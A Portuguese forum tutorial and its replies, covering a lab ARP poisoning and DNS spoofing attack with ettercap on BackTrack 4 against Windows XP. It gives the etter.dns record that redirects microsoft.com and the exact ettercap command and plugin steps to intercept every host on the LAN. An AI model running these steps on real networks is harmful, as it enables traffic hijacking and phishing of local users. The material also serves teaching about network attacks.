Arp Poisoning + Dns spoofing

[Jarlley Ribeiro]

Música: Leave a Scar - Marilyn Manson

Descrição:
Nessa vídeo aula mostro como usar uma técnica onde possamos redirecionar a vítima para onde nós quisermos. Primeiramente tenho que fazer na minha rede o famoso "arp poisoning", onde faço um broadcast na rede, pego todos os endereços MAC, enveneno o cacher arp de cada uma das máquinas. Depois entra o Dns spoofing, onde a vitima digita "www.microsoft.com" será redirecionado para "www.exploit-db.com" :-)

Cenário:
BackTrack 4 & Windows xp SP3

O que fiz?

1.0 - Editei o arquivo "etter.dns", onde:
www.microsoft.com A 67.23.70.60

www.microsoft.com = Nosso alvo.
A = tipo de redirecionamento.
67.23.70.60 = IP do site que será redirecionado.

1.1 - Ettercap
# ettercap -T -q -M arp // onde:

ettercap = Programa ettercap.
-T = Interfaçe de texto.
-q = Para ficar em modo silencioso.
-M arp = Tipo de redirecionameto.
// = Todos os hosts da rede.

Depois tecle "h", depois prossiga teclando "p", e depois digite "dns_spoof" (nome do plugin).

Vídeo demostrativo.


A vitima digita www.microsoft.com e será redirecionado para o site da Exploit DB.
Ps: Essa tecnica só funciona em rede local :-(

Jarlley Ribeiro | J4rll3y@gmail.com

[neothunder]

Valeu pela video aula amigo! Obrigado por compartilhar!

[Marcelo Moraes]

Obrigado por disponibilizar amigo.
ettercap sempre foi muito útil quando se trata de Rede Loca =D.

Parabéns!

[fvox]

Hi.

Opa, obrigado novamente, Jarlley.
Um amigo está fazendo um trabalho sobre ataques no protocolo TCP/IP. Acho que este material vai cair como uma luva hahahh.
Vou recomendar à ele.

[]'s

[podolcee]

A luva ainda é grande Fvox !